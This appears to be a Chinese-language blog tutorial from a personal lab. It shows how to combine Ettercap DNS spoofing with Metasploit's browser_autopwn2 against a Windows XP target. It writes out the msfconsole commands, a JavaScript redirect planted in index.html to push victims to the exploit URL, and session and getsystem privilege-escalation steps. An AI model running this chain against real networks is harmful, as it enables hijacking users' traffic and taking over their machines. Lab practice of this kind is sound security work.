使用MSF和Ettercap进行自动化浏览器攻击

  • 前言
  • 攻击过程

一. 前言

1. MSF模块:browser_autopwn2

browser_autopwn2是Metasploit提供的辅助功能模块。在受害者访问Web页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn2能够检测用户使用的浏览器类型, browser_autopwn2将根据浏览器的检测结果,自行选择最合适的EXP。


二. 攻击过程

1. 攻击环境

攻击机:kali linux 2019.1

靶机:Windows xp Professional sp3

2. 攻击步骤

2.1 使用Ettercap进行DNS欺骗

该过程参考使用Ettercap实现DNS欺骗的简单测试一文

2.2 使用browser_autopwn2模块生成恶意URL

1
2
3
4
5
6
/etc/init.d/postgresql start
msfdb init
msfconsole
search browser_autopwn2
use auxiliary/server/browser_autopwn2
run

2.3 添加跳转脚本

进入网站目录下,修改index.html文件,设置如下内容

1
2
3
4
<script language="javascript" type="text/javascript"> 
// 以下方式定时跳转
setTimeout("javascript:location.href='Hello!'", 1000);
</script>

注意将Hello!修改为MSF生成的恶意url

2.4 靶机访问

靶机访问百度网站,可以看到页面跳转,此时MSF已经开始进行攻击

1

2.5 启动会话

MSF创建会话之后,我们需要手动启用会话

1
sessions -l

2

1
sessions -i 1	#1为目标机器id

3

在攻击过程中可能会出现浏览器崩溃等情况,可以多尝试几次

1
2
3
getuid
getsystem
getuid

4

关于命令行乱码问题可以调整Linux终端的编码类型为GBK2312

5



-------------本文结束感谢您的阅读-------------

本文标题:使用MSF和Ettercap进行自动化浏览器攻击

文章作者:J2ck7a1 Ch33

发布时间:2019年04月09日 - 20:04

最后更新:2019年05月01日 - 14:05

原始链接:http://yoursite.com/msf-browser-autopwn2/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。


想喝快乐水